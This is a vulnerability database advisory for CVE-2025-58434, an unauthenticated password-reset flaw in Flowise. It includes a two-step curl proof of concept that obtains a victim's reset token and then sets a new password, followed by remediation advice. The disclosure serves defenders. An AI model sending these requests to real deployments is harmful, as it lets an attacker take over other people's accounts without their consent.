Vulnerability Database

296,278

Total vulnerabilities in the database

CVE-2025-58434

Summary

The forgot-password endpoint in Flowise returns sensitive information including a valid password reset tempToken without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO).

This vulnerability applies to both the cloud service (cloud.flowiseai.com) and self-hosted/local Flowise deployments that expose the same API.

CVSS v3.1 Base Score: 9.8 (Critical) Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

  • The endpoint /api/v1/account/forgot-password accepts an email address as input.

  • Instead of only sending a reset email, the API responds directly with sensitive user details, including:

    • User ID, name, email, hashed credential, status, timestamps.
    • A valid tempToken and its expiry, which is intended for password reset.

  • This tempToken can then be reused immediately in the /api/v1/account/reset-password endpoint to reset the password of the targeted account without any email verification or user interaction.

  • Exploitation requires only the victim’s email address, which is often guessable or discoverable.

  • Because the vulnerable endpoints exist in both Flowise Cloud and local/self-hosted deployments, any exposed instance is vulnerable to account takeover.

This effectively allows any unauthenticated attacker to take over arbitrary accounts (including admin or privileged accounts) by requesting a reset for their email.

PoC

  1. Request a reset token for the victim
curl -i -X POST https://<target>/api/v1/account/forgot-password \ -H "Content-Type: application/json" \ -d '{"user":{"email":"<victim@example.com>"}}'

Response (201 Created):

{ "user": { "id": "<redacted-uuid>", "name": "<redacted>", "email": "<victim@example.com>", "credential": "<redacted-hash>", "tempToken": "<redacted-tempToken>", "tokenExpiry": "2025-08-19T13:00:33.834Z", "status": "active" } }
  1. Use the exposed tempToken to reset the password
curl -i -X POST https://<target>/api/v1/account/reset-password \ -H "Content-Type: application/json" \ -d '{ "user":{ "email":"<victim@example.com>", "tempToken":"<redacted-tempToken>", "password":"NewSecurePassword123!" } }'

Expected Result: 200 OK The victim’s account password is reset, allowing full login.

Impact

  • Type: Authentication bypass / Insecure direct object exposure.

  • Impact:

    • Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.
    • Applies to both Flowise Cloud and locally hosted/self-managed deployments.
    • Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.
    • High likelihood of exploitation since no prior access or user interaction is required.
  • Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.
  • Ensure forgot-password responds with a generic success message regardless of input, to avoid user enumeration.
  • Require strong validation of the tempToken (e.g., single-use, short expiry, tied to request origin, validated against email delivery).
  • Apply the same fixes to both cloud and self-hosted/local deployments.
  • Log and monitor password reset requests for suspicious activity.
  • Consider multi-factor verification for sensitive accounts.

Credit

⚠️ This is a Critical ATO vulnerability because it allows attackers to compromise any account with only knowledge of an email address, and it applies to all deployment models (cloud and local).

CVSS v3:

  • Severity: Unknown
  • Score:
  • AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWEs:

Software From Fixed in
Node.js icon flowise - 3.0.6